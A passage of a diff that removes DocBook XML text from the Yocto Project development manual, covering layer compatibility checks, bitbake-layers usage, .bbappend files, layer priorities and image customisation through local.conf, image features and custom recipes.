-                    <listitem><para>
-                        Be able to check the box indicating that you
-                        got a "PASS" when running the script against your
-                        layer.
-                        </para></listitem>
-                    <listitem><para>
-                        Answer "Yes" to the questions on the form or have an
-                        acceptable explanation for any questions answered "No".
-                        </para></listitem>
-                    <listitem><para>
-                        Be a Yocto Project Member Organization.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                The remainder of this section presents information on the
-                registration form and on the
-                <filename>yocto-check-layer</filename> script.
-            </para>
-
-            <section id='yocto-project-compatible-program-application'>
-                <title>Yocto Project Compatible Program Application</title>
-
-                <para>
-                    Use the form to apply for your layer's approval.
-                    Upon successful application, you can use the Yocto
-                    Project Compatibility Logo with your layer and the
-                    application that uses your layer.
-                </para>
-
-                <para>
-                    To access the form, use this link:
-                    <ulink url='https://www.yoctoproject.org/webform/yocto-project-compatible-registration'></ulink>.
-                    Follow the instructions on the form to complete your
-                    application.
-                </para>
-
-                <para>
-                    The application consists of the following sections:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis>Contact Information:</emphasis>
-                            Provide your contact information as the fields
-                            require.
-                            Along with your information, provide the
-                            released versions of the Yocto Project for which
-                            your layer is compatible.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Acceptance Criteria:</emphasis>
-                            Provide "Yes" or "No" answers for each of the
-                            items in the checklist.
-                            Space exists at the bottom of the form for any
-                            explanations for items for which you answered "No".
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Recommendations:</emphasis>
-                            Provide answers for the questions regarding Linux
-                            kernel use and build success.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='yocto-check-layer-script'>
-                <title><filename>yocto-check-layer</filename> Script</title>
-
-                <para>
-                    The <filename>yocto-check-layer</filename> script
-                    provides you a way to assess how compatible your layer is
-                    with the Yocto Project.
-                    You should run this script prior to using the form to
-                    apply for compatibility as described in the previous
-                    section.
-                    You need to achieve a "PASS" result in order to have
-                    your application form successfully processed.
-                </para>
-
-                <para>
-                    The script divides tests into three areas: COMMON, BSP,
-                    and DISTRO.
-                    For example, given a distribution layer (DISTRO), the
-                    layer must pass both the COMMON and DISTRO related tests.
-                    Furthermore, if your layer is a BSP layer, the layer must
-                    pass the COMMON and BSP set of tests.
-                </para>
-
-                <para>
-                    To execute the script, enter the following commands from
-                    your build directory:
-                    <literallayout class='monospaced'>
-     $ source oe-init-build-env
-     $ yocto-check-layer <replaceable>your_layer_directory</replaceable>
-                    </literallayout>
-                    Be sure to provide the actual directory for your layer
-                    as part of the command.
-                </para>
-
-                <para>
-                    Entering the command causes the script to determine the
-                    type of layer and then to execute a set of specific
-                    tests against the layer.
-                    The following list overviews the test:
-                    <itemizedlist>
-                        <listitem><para>
-                            <filename>common.test_readme</filename>:
-                            Tests if a <filename>README</filename> file
-                            exists in the layer and the file is not empty.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>common.test_parse</filename>:
-                            Tests to make sure that BitBake can parse the
-                            files without error (i.e.
-                            <filename>bitbake -p</filename>).
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>common.test_show_environment</filename>:
-                            Tests that the global or per-recipe environment
-                            is in order without errors (i.e.
-                            <filename>bitbake -e</filename>).
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>common.test_world</filename>:
-                            Verifies that <filename>bitbake world</filename> works.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>common.test_signatures</filename>:
-                            Tests to be sure that BSP and DISTRO layers do not
-                            come with recipes that change signatures.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>common.test_layerseries_compat</filename>:
-                            Verifies layer compatibility is set properly.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>bsp.test_bsp_defines_machines</filename>:
-                            Tests if a BSP layer has machine configurations.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>bsp.test_bsp_no_set_machine</filename>:
-                            Tests to ensure a BSP layer does not set the
-                            machine when the layer is added.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>bsp.test_machine_world</filename>:
-                            Verifies that <filename>bitbake world</filename>
-                            works regardless of which machine is selected.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>bsp.test_machine_signatures</filename>:
-                            Verifies that building for a particular machine
-                            affects only the signature of tasks specific to that
-                            machine.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>distro.test_distro_defines_distros</filename>:
-                            Tests if a DISTRO layer has distro configurations.
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>distro.test_distro_no_set_distros</filename>:
-                            Tests to ensure a DISTRO layer does not set the
-                            distribution when the layer is added.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-        </section>
-
-        <section id='enabling-your-layer'>
-            <title>Enabling Your Layer</title>
-
-            <para>
-                Before the OpenEmbedded build system can use your new layer,
-                you need to enable it.
-                To enable your layer, simply add your layer's path to the
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'>BBLAYERS</ulink></filename>
-                variable in your <filename>conf/bblayers.conf</filename> file,
-                which is found in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                The following example shows how to enable a layer named
-                <filename>meta-mylayer</filename>:
-                <literallayout class='monospaced'>
-     # POKY_BBLAYERS_CONF_VERSION is increased each time build/conf/bblayers.conf
-     # changes incompatibly
-     POKY_BBLAYERS_CONF_VERSION = "2"
-
-     BBPATH = "${TOPDIR}"
-     BBFILES ?= ""
-
-     BBLAYERS ?= " \
-       /home/<replaceable>user</replaceable>/poky/meta \
-       /home/<replaceable>user</replaceable>/poky/meta-poky \
-       /home/<replaceable>user</replaceable>/poky/meta-yocto-bsp \
-       /home/<replaceable>user</replaceable>/poky/meta-mylayer \
-       "
-                </literallayout>
-            </para>
-
-            <para>
-                BitBake parses each <filename>conf/layer.conf</filename> file
-                from the top down as specified in the
-                <filename>BBLAYERS</filename> variable
-                within the <filename>conf/bblayers.conf</filename> file.
-                During the processing of each
-                <filename>conf/layer.conf</filename> file, BitBake adds the
-                recipes, classes and configurations contained within the
-                particular layer to the source directory.
-            </para>
-        </section>
-
-        <section id='using-bbappend-files'>
-            <title>Using .bbappend Files in Your Layer</title>
-
-            <para>
-                A recipe that appends Metadata to another recipe is called a
-                BitBake append file.
-                A BitBake append file uses the <filename>.bbappend</filename>
-                file type suffix, while the corresponding recipe to which
-                Metadata is being appended uses the <filename>.bb</filename>
-                file type suffix.
-            </para>
-
-            <para>
-                You can use a <filename>.bbappend</filename> file in your
-                layer to make additions or changes to the content of another
-                layer's recipe without having to copy the other layer's
-                recipe into your layer.
-                Your <filename>.bbappend</filename> file resides in your layer,
-                while the main <filename>.bb</filename> recipe file to
-                which you are appending Metadata resides in a different layer.
-            </para>
-
-            <para>
-                Being able to append information to an existing recipe not only
-                avoids duplication, but also automatically applies recipe
-                changes from a different layer into your layer.
-                If you were copying recipes, you would have to manually merge
-                changes as they occur.
-            </para>
-
-            <para>
-                When you create an append file, you must use the same root
-                name as the corresponding recipe file.
-                For example, the append file
-                <filename>someapp_&DISTRO;.bbappend</filename> must apply to
-                <filename>someapp_&DISTRO;.bb</filename>.
-                This means the original recipe and append file names are
-                version number-specific.
-                If the corresponding recipe is renamed to update to a newer
-                version, you must also rename and possibly update
-                the corresponding <filename>.bbappend</filename> as well.
-                During the build process, BitBake displays an error on starting
-                if it detects a <filename>.bbappend</filename> file that does
-                not have a corresponding recipe with a matching name.
-                See the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_DANGLINGAPPENDS_WARNONLY'><filename>BB_DANGLINGAPPENDS_WARNONLY</filename></ulink>
-                variable for information on how to handle this error.
-            </para>
-
-            <para>
-                As an example, consider the main formfactor recipe and a
-                corresponding formfactor append file both from the
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                Here is the main formfactor recipe, which is named
-                <filename>formfactor_0.0.bb</filename> and located in the
-                "meta" layer at
-                <filename>meta/recipes-bsp/formfactor</filename>:
-                <literallayout class='monospaced'>
-     SUMMARY = "Device formfactor information"
-     SECTION = "base"
-     LICENSE = "MIT"
-     LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
-     PR = "r45"
-
-     SRC_URI = "file://config file://machconfig"
-     S = "${WORKDIR}"
-
-     PACKAGE_ARCH = "${MACHINE_ARCH}"
-     INHIBIT_DEFAULT_DEPS = "1"
-
-     do_install() {
-	     # Install file only if it has contents
-             install -d ${D}${sysconfdir}/formfactor/
-             install -m 0644 ${S}/config ${D}${sysconfdir}/formfactor/
-	     if [ -s "${S}/machconfig" ]; then
-	             install -m 0644 ${S}/machconfig ${D}${sysconfdir}/formfactor/
-	     fi
-     }                </literallayout>
-                In the main recipe, note the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                variable, which tells the OpenEmbedded build system where to
-                find files during the build.
-            </para>
-
-            <para>
-                Following is the append file, which is named
-                <filename>formfactor_0.0.bbappend</filename> and is from the
-                Raspberry Pi BSP Layer named
-                <filename>meta-raspberrypi</filename>.
-                The file is in the layer at
-                <filename>recipes-bsp/formfactor</filename>:
-                <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-                </literallayout>
-            </para>
-
-            <para>
-                By default, the build system uses the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
-                variable to locate files.
-                This append file extends the locations by setting the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                variable.
-                Setting this variable in the <filename>.bbappend</filename>
-                file is the most reliable and recommended method for adding
-                directories to the search path used by the build system
-                to find files.
-            </para>
-
-            <para>
-                The statement in this example extends the directories to
-                include
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-THISDIR'><filename>THISDIR</filename></ulink><filename>}/${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>,
-                which resolves to a directory named
-                <filename>formfactor</filename> in the same directory
-                in which the append file resides (i.e.
-                <filename>meta-raspberrypi/recipes-bsp/formfactor</filename>.
-                This implies that you must have the supporting directory
-                structure set up that will contain any files or patches you
-                will be including from the layer.
-            </para>
-
-            <para>
-                Using the immediate expansion assignment operator
-                <filename>:=</filename> is important because of the reference
-                to <filename>THISDIR</filename>.
-                The trailing colon character is important as it ensures that
-                items in the list remain colon-separated.
-                <note>
-                    <para>
-                        BitBake automatically defines the
-                        <filename>THISDIR</filename> variable.
-                        You should never set this variable yourself.
-                        Using "_prepend" as part of the
-                        <filename>FILESEXTRAPATHS</filename> ensures your path
-                        will be searched prior to other paths in the final
-                        list.
-                    </para>
-
-                    <para>
-                        Also, not all append files add extra files.
-                        Many append files simply exist to add build options
-                        (e.g. <filename>systemd</filename>).
-                        For these cases, your append file would not even
-                        use the <filename>FILESEXTRAPATHS</filename> statement.
-                    </para>
-                </note>
-            </para>
-        </section>
-
-        <section id='prioritizing-your-layer'>
-            <title>Prioritizing Your Layer</title>
-
-            <para>
-                Each layer is assigned a priority value.
-                Priority values control which layer takes precedence if there
-                are recipe files with the same name in multiple layers.
-                For these cases, the recipe file from the layer with a higher
-                priority number takes precedence.
-                Priority values also affect the order in which multiple
-                <filename>.bbappend</filename> files for the same recipe are
-                applied.
-                You can either specify the priority manually, or allow the
-                build system to calculate it based on the layer's dependencies.
-            </para>
-
-            <para>
-                To specify the layer's priority manually, use the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PRIORITY'><filename>BBFILE_PRIORITY</filename></ulink>
-                variable and append the layer's root name:
-                <literallayout class='monospaced'>
-     BBFILE_PRIORITY_mylayer = "1"
-                </literallayout>
-            </para>
-
-            <note>
-                <para>It is possible for a recipe with a lower version number
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
-                in a layer that has a higher priority to take precedence.</para>
-                <para>Also, the layer priority does not currently affect the
-                precedence order of <filename>.conf</filename>
-                or <filename>.bbclass</filename> files.
-                Future versions of BitBake might address this.</para>
-            </note>
-        </section>
-
-        <section id='managing-layers'>
-            <title>Managing Layers</title>
-
-            <para>
-                You can use the BitBake layer management tool
-                <filename>bitbake-layers</filename> to provide a view
-                into the structure of recipes across a multi-layer project.
-                Being able to generate output that reports on configured layers
-                with their paths and priorities and on
-                <filename>.bbappend</filename> files and their applicable
-                recipes can help to reveal potential problems.
-            </para>
-
-            <para>
-                For help on the BitBake layer management tool, use the
-                following command:
-                <literallayout class='monospaced'>
-     $ bitbake-layers --help
-     NOTE: Starting bitbake server...
-     usage: bitbake-layers [-d] [-q] [-F] [--color COLOR] [-h] &lt;subcommand&gt; ...
-
-     BitBake layers utility
-
-     optional arguments:
-       -d, --debug           Enable debug output
-       -q, --quiet           Print only errors
-       -F, --force           Force add without recipe parse verification
-       --color COLOR         Colorize output (where COLOR is auto, always, never)
-       -h, --help            show this help message and exit
-
-     subcommands:
-       &lt;subcommand&gt;
-         show-layers         show current configured layers.
-         show-overlayed      list overlayed recipes (where the same recipe exists
-                             in another layer)
-         show-recipes        list available recipes, showing the layer they are
-                             provided by
-         show-appends        list bbappend files and recipe files they apply to
-         show-cross-depends  Show dependencies between recipes that cross layer
-                             boundaries.
-         add-layer           Add one or more layers to bblayers.conf.
-         remove-layer        Remove one or more layers from bblayers.conf.
-         flatten             flatten layer configuration into a separate output
-                             directory.
-         layerindex-fetch    Fetches a layer from a layer index along with its
-                             dependent layers, and adds them to conf/bblayers.conf.
-         layerindex-show-depends
-                             Find layer dependencies from layer index.
-         create-layer        Create a basic layer
-
-     Use bitbake-layers &lt;subcommand&gt; --help to get help on a specific command
-                </literallayout>
-            </para>
-
-            <para>
-                The following list describes the available commands:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis><filename>help:</filename></emphasis>
-                        Displays general help or help on a specified command.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>show-layers:</filename></emphasis>
-                        Shows the current configured layers.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>show-overlayed:</filename></emphasis>
-                        Lists overlayed recipes.
-                        A recipe is overlayed when a recipe with the same name
-                        exists in another layer that has a higher layer
-                        priority.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>show-recipes:</filename></emphasis>
-                        Lists available recipes and the layers that provide them.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>show-appends:</filename></emphasis>
-                        Lists <filename>.bbappend</filename> files and the
-                        recipe files to which they apply.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>show-cross-depends:</filename></emphasis>
-                        Lists dependency relationships between recipes that
-                        cross layer boundaries.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>add-layer:</filename></emphasis>
-                        Adds a layer to <filename>bblayers.conf</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>remove-layer:</filename></emphasis>
-                        Removes a layer from <filename>bblayers.conf</filename>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>flatten:</filename></emphasis>
-                        Flattens the layer configuration into a separate output
-                        directory.
-                        Flattening your layer configuration builds a "flattened"
-                        directory that contains the contents of all layers,
-                        with any overlayed recipes removed and any
-                        <filename>.bbappend</filename> files appended to the
-                        corresponding recipes.
-                        You might have to perform some manual cleanup of the
-                        flattened layer as follows:
-                        <itemizedlist>
-                            <listitem><para>
-                                Non-recipe files (such as patches)
-                                are overwritten.
-                                The flatten command shows a warning for these
-                                files.
-                                </para></listitem>
-                            <listitem><para>
-                                Anything beyond the normal layer
-                                setup has been added to the
-                                <filename>layer.conf</filename> file.
-                                Only the lowest priority layer's
-                                <filename>layer.conf</filename> is used.
-                                </para></listitem>
-                            <listitem><para>
-                                Overridden and appended items from
-                                <filename>.bbappend</filename> files need to be
-                                cleaned up.
-                                The contents of each
-                                <filename>.bbappend</filename> end up in the
-                                flattened recipe.
-                                However, if there are appended or changed
-                                variable values, you need to tidy these up
-                                yourself.
-                                Consider the following example.
-                                Here, the <filename>bitbake-layers</filename>
-                                command adds the line
-                                <filename>#### bbappended ...</filename> so that
-                                you know where the following lines originate:
-                                <literallayout class='monospaced'>
-     ...
-     DESCRIPTION = "A useful utility"
-     ...
-     EXTRA_OECONF = "--enable-something"
-     ...
-
-     #### bbappended from meta-anotherlayer ####
-
-     DESCRIPTION = "Customized utility"
-     EXTRA_OECONF += "--enable-somethingelse"
-                                </literallayout>
-                                Ideally, you would tidy up these utilities as
-                                follows:
-                                <literallayout class='monospaced'>
-     ...
-     DESCRIPTION = "Customized utility"
-     ...
-     EXTRA_OECONF = "--enable-something --enable-somethingelse"
-     ...
-                                </literallayout>
-                                </para></listitem>
-                        </itemizedlist>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>layerindex-fetch</filename>:</emphasis>
-                        Fetches a layer from a layer index, along with its
-                        dependent layers, and adds the layers to the
-                        <filename>conf/bblayers.conf</filename> file.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>layerindex-show-depends</filename>:</emphasis>
-                        Finds layer dependencies from the layer index.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>create-layer</filename>:</emphasis>
-                        Creates a basic layer.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='creating-a-general-layer-using-the-bitbake-layers-script'>
-            <title>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</title>
-
-            <para>
-                The <filename>bitbake-layers</filename> script with the
-                <filename>create-layer</filename> subcommand simplifies
-                creating a new general layer.
-                <note><title>Notes</title>
-                    <itemizedlist>
-                        <listitem><para>
-                            For information on BSP layers, see the
-                            "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
-                            section in the Yocto Project Board Specific (BSP)
-                            Developer's Guide.
-                            </para></listitem>
-                        <listitem><para>
-                            In order to use a layer with the OpenEmbedded
-                            build system, you need to add the layer to your
-                            <filename>bblayers.conf</filename> configuration
-                            file.
-                            See the
-                            "<link linkend='adding-a-layer-using-the-bitbake-layers-script'>Adding a Layer Using the <filename>bitbake-layers</filename> Script</link>"
-                            section for more information.
-                            </para></listitem>
-                    </itemizedlist>
-                </note>
-                The default mode of the script's operation with this
-                subcommand is to create a layer with the following:
-                <itemizedlist>
-                    <listitem><para>A layer priority of 6.
-                        </para></listitem>
-                    <listitem><para>A <filename>conf</filename>
-                        subdirectory that contains a
-                        <filename>layer.conf</filename> file.
-                        </para></listitem>
-                    <listitem><para>
-                        A <filename>recipes-example</filename> subdirectory
-                        that contains a further subdirectory named
-                        <filename>example</filename>, which contains
-                        an <filename>example.bb</filename> recipe file.
-                        </para></listitem>
-                    <listitem><para>A <filename >COPYING.MIT</filename>,
-                        which is the license statement for the layer.
-                        The script assumes you want to use the MIT license,
-                        which is typical for most layers, for the contents of
-                        the layer itself.
-                        </para></listitem>
-                    <listitem><para>
-                        A <filename>README</filename> file, which is a file
-                        describing the contents of your new layer.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                In its simplest form, you can use the following command form
-                to create a layer.
-                The command creates a layer whose name corresponds to
-                <replaceable>your_layer_name</replaceable> in the current
-                directory:
-                <literallayout class='monospaced'>
-     $ bitbake-layers create-layer <replaceable>your_layer_name</replaceable>
-                </literallayout>
-                As an example, the following command creates a layer named
-                <filename>meta-scottrif</filename> in your home directory:
-                <literallayout class='monospaced'>
-     $ cd /usr/home
-     $ bitbake-layers create-layer meta-scottrif
-     NOTE: Starting bitbake server...
-     Add your new layer with 'bitbake-layers add-layer meta-scottrif'
-                </literallayout>
-            </para>
-
-            <para>
-                If you want to set the priority of the layer to other than the
-                default value of "6", you can either use the
-                <filename>&dash;&dash;priority</filename> option or you can
-                edit the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PRIORITY'><filename>BBFILE_PRIORITY</filename></ulink>
-                value in the <filename>conf/layer.conf</filename> after the
-                script creates it.
-                Furthermore, if you want to give the example recipe file
-                some name other than the default, you can
-                use the
-                <filename>&dash;&dash;example-recipe-name</filename> option.
-            </para>
-
-            <para>
-                The easiest way to see how the
-                <filename>bitbake-layers create-layer</filename> command
-                works is to experiment with the script.
-                You can also read the usage information by entering the
-                following:
-                <literallayout class='monospaced'>
-     $ bitbake-layers create-layer --help
-     NOTE: Starting bitbake server...
-     usage: bitbake-layers create-layer [-h] [--priority PRIORITY]
-                                        [--example-recipe-name EXAMPLERECIPE]
-                                        layerdir
-
-     Create a basic layer
-
-     positional arguments:
-       layerdir              Layer directory to create
-
-     optional arguments:
-       -h, --help            show this help message and exit
-       --priority PRIORITY, -p PRIORITY
-                             Layer directory to create
-       --example-recipe-name EXAMPLERECIPE, -e EXAMPLERECIPE
-                             Filename of the example recipe
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='adding-a-layer-using-the-bitbake-layers-script'>
-            <title>Adding a Layer Using the <filename>bitbake-layers</filename> Script</title>
-
-            <para>
-                Once you create your general layer, you must add it to your
-                <filename>bblayers.conf</filename> file.
-                Adding the layer to this configuration file makes the
-                OpenEmbedded build system aware of your layer so that it can
-                search it for metadata.
-            </para>
-
-            <para>
-                Add your layer by using the
-                <filename>bitbake-layers add-layer</filename> command:
-                <literallayout class='monospaced'>
-     $ bitbake-layers add-layer <replaceable>your_layer_name</replaceable>
-                </literallayout>
-                Here is an example that adds a layer named
-                <filename>meta-scottrif</filename> to the configuration file.
-                Following the command that adds the layer is another
-                <filename>bitbake-layers</filename> command that shows the
-                layers that are in your <filename>bblayers.conf</filename>
-                file:
-                <literallayout class='monospaced'>
-     $ bitbake-layers add-layer meta-scottrif
-     NOTE: Starting bitbake server...
-     Parsing recipes: 100% |##########################################################| Time: 0:00:49
-     Parsing of 1441 .bb files complete (0 cached, 1441 parsed). 2055 targets, 56 skipped, 0 masked, 0 errors.
-     $ bitbake-layers show-layers
-     NOTE: Starting bitbake server...
-     layer                 path                                      priority
-     ==========================================================================
-     meta                  /home/scottrif/poky/meta                  5
-     meta-poky             /home/scottrif/poky/meta-poky             5
-     meta-yocto-bsp        /home/scottrif/poky/meta-yocto-bsp        5
-     workspace             /home/scottrif/poky/build/workspace       99
-     meta-scottrif         /home/scottrif/poky/build/meta-scottrif   6
-                </literallayout>
-                Adding the layer to this file enables the build system to
-                locate the layer during the build.
-                <note>
-                    During a build, the OpenEmbedded build system looks in
-                    the layers from the top of the list down to the bottom
-                    in that order.
-                </note>
-                </para>
-        </section>
-    </section>
-
-    <section id='usingpoky-extend-customimage'>
-        <title>Customizing Images</title>
-
-        <para>
-            You can customize images to satisfy particular requirements.
-            This section describes several methods and provides guidelines for each.
-        </para>
-
-        <section id='usingpoky-extend-customimage-localconf'>
-            <title>Customizing Images Using <filename>local.conf</filename></title>
-
-            <para>
-                Probably the easiest way to customize an image is to add a
-                package by way of the <filename>local.conf</filename>
-                configuration file.
-                Because it is limited to local use, this method generally only
-                allows you to add packages and is not as flexible as creating
-                your own customized image.
-                When you add packages using local variables this way, you need
-                to realize that these variable changes are in effect for every
-                build and consequently affect all images, which might not
-                be what you require.
-            </para>
-
-            <para>
-                To add a package to your image using the local configuration
-                file, use the
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'>IMAGE_INSTALL</ulink></filename>
-                variable with the <filename>_append</filename> operator:
-                <literallayout class='monospaced'>
-     IMAGE_INSTALL_append = " strace"
-                </literallayout>
-                Use of the syntax is important - specifically, the space between
-                the quote and the package name, which is
-                <filename>strace</filename> in this example.
-                This space is required since the <filename>_append</filename>
-                operator does not add the space.
-            </para>
-
-            <para>
-                Furthermore, you must use <filename>_append</filename> instead
-                of the <filename>+=</filename> operator if you want to avoid
-                ordering issues.
-                The reason for this is because doing so unconditionally appends
-                to the variable and avoids ordering problems due to the
-                variable being set in image recipes and
-                <filename>.bbclass</filename> files with operators like
-                <filename>?=</filename>.
-                Using <filename>_append</filename> ensures the operation takes
-                affect.
-            </para>
-
-            <para>
-                As shown in its simplest use,
-                <filename>IMAGE_INSTALL_append</filename> affects all images.
-                It is possible to extend the syntax so that the variable
-                applies to a specific image only.
-                Here is an example:
-                <literallayout class='monospaced'>
-     IMAGE_INSTALL_append_pn-core-image-minimal = " strace"
-                </literallayout>
-                This example adds <filename>strace</filename> to the
-                <filename>core-image-minimal</filename> image only.
-            </para>
-
-            <para>
-                You can add packages using a similar approach through the
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-CORE_IMAGE_EXTRA_INSTALL'>CORE_IMAGE_EXTRA_INSTALL</ulink></filename>
-                variable.
-                If you use this variable, only
-                <filename>core-image-*</filename> images are affected.
-            </para>
-        </section>
-
-        <section id='usingpoky-extend-customimage-imagefeatures'>
-            <title>Customizing Images Using Custom <filename>IMAGE_FEATURES</filename> and
-                <filename>EXTRA_IMAGE_FEATURES</filename></title>
-
-            <para>
-                Another method for customizing your image is to enable or
-                disable high-level image features by using the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
-                and <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>
-                variables.
-                Although the functions for both variables are nearly equivalent,
-                best practices dictate using <filename>IMAGE_FEATURES</filename>
-                from within a recipe and using
-                <filename>EXTRA_IMAGE_FEATURES</filename> from within
-                your <filename>local.conf</filename> file, which is found in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-            </para>
-
-            <para>
-                To understand how these features work, the best reference is
-                <filename>meta/classes/core-image.bbclass</filename>.
-                This class lists out the available
-                <filename>IMAGE_FEATURES</filename> of which most map to
-                package groups while some, such as
-                <filename>debug-tweaks</filename> and
-                <filename>read-only-rootfs</filename>, resolve as general
-                configuration settings.
-            </para>
-
-            <para>
-                In summary, the file looks at the contents of the
-                <filename>IMAGE_FEATURES</filename> variable and then maps
-                or configures the feature accordingly.
-                Based on this information, the build system automatically
-                adds the appropriate packages or configurations to the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>
-                variable.
-                Effectively, you are enabling extra features by extending the
-                class or creating a custom class for use with specialized image
-                <filename>.bb</filename> files.
-            </para>
-
-            <para>
-                Use the <filename>EXTRA_IMAGE_FEATURES</filename> variable
-                from within your local configuration file.
-                Using a separate area from which to enable features with
-                this variable helps you avoid overwriting the features in the
-                image recipe that are enabled with
-                <filename>IMAGE_FEATURES</filename>.
-                The value of <filename>EXTRA_IMAGE_FEATURES</filename> is added
-                to <filename>IMAGE_FEATURES</filename> within
-                <filename>meta/conf/bitbake.conf</filename>.
-            </para>
-
-            <para>
-                To illustrate how you can use these variables to modify your
-                image, consider an example that selects the SSH server.
-                The Yocto Project ships with two SSH servers you can use
-                with your images: Dropbear and OpenSSH.
-                Dropbear is a minimal SSH server appropriate for
-                resource-constrained environments, while OpenSSH is a
-                well-known standard SSH server implementation.
-                By default, the <filename>core-image-sato</filename> image
-                is configured to use Dropbear.
-                The <filename>core-image-full-cmdline</filename> and
-                <filename>core-image-lsb</filename> images both
-                include OpenSSH.
-                The <filename>core-image-minimal</filename> image does not
-                contain an SSH server.
-            </para>
-
-            <para>
-                You can customize your image and change these defaults.
-                Edit the <filename>IMAGE_FEATURES</filename> variable
-                in your recipe or use the
-                <filename>EXTRA_IMAGE_FEATURES</filename> in your
-                <filename>local.conf</filename> file so that it configures the
-                image you are working with to include
-                <filename>ssh-server-dropbear</filename> or
-                <filename>ssh-server-openssh</filename>.
-            </para>
-
-            <note>
-                See the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
-                section in the Yocto Project Reference Manual for a complete
-                list of image features that ship with the Yocto Project.
-            </note>
-        </section>
-
-        <section id='usingpoky-extend-customimage-custombb'>
-            <title>Customizing Images Using Custom .bb Files</title>
-
-            <para>
-                You can also customize an image by creating a custom recipe
-                that defines additional software as part of the image.
-                The following example shows the form for the two lines you need:
-                <literallayout class='monospaced'>
-     IMAGE_INSTALL = "packagegroup-core-x11-base package1 package2"
-
-     inherit core-image
-                </literallayout>
-            </para>
-
-            <para>
-                Defining the software using a custom recipe gives you total
-                control over the contents of the image.
-                It is important to use the correct names of packages in the
-                <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'>IMAGE_INSTALL</ulink></filename>
-                variable.
-                You must use the OpenEmbedded notation and not the Debian notation for the names
-                (e.g. <filename>glibc-dev</filename> instead of <filename>libc6-dev</filename>).
-            </para>
-
-            <para>
-                The other method for creating a custom image is to base it on an existing image.
-                For example, if you want to create an image based on <filename>core-image-sato</filename>
-                but add the additional package <filename>strace</filename> to the image,
-                copy the <filename>meta/recipes-sato/images/core-image-sato.bb</filename> to a
-                new <filename>.bb</filename> and add the following line to the end of the copy:
-                <literallayout class='monospaced'>
-     IMAGE_INSTALL += "strace"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='usingpoky-extend-customimage-customtasks'>
-            <title>Customizing Images Using Custom Package Groups</title>
-
-            <para>
-                For complex custom images, the best approach for customizing
-                an image is to create a custom package group recipe that is
-                used to build the image or images.
-                A good example of a package group recipe is
-                <filename>meta/recipes-core/packagegroups/packagegroup-base.bb</filename>.
-            </para>
-
-            <para>
-                If you examine that recipe, you see that the
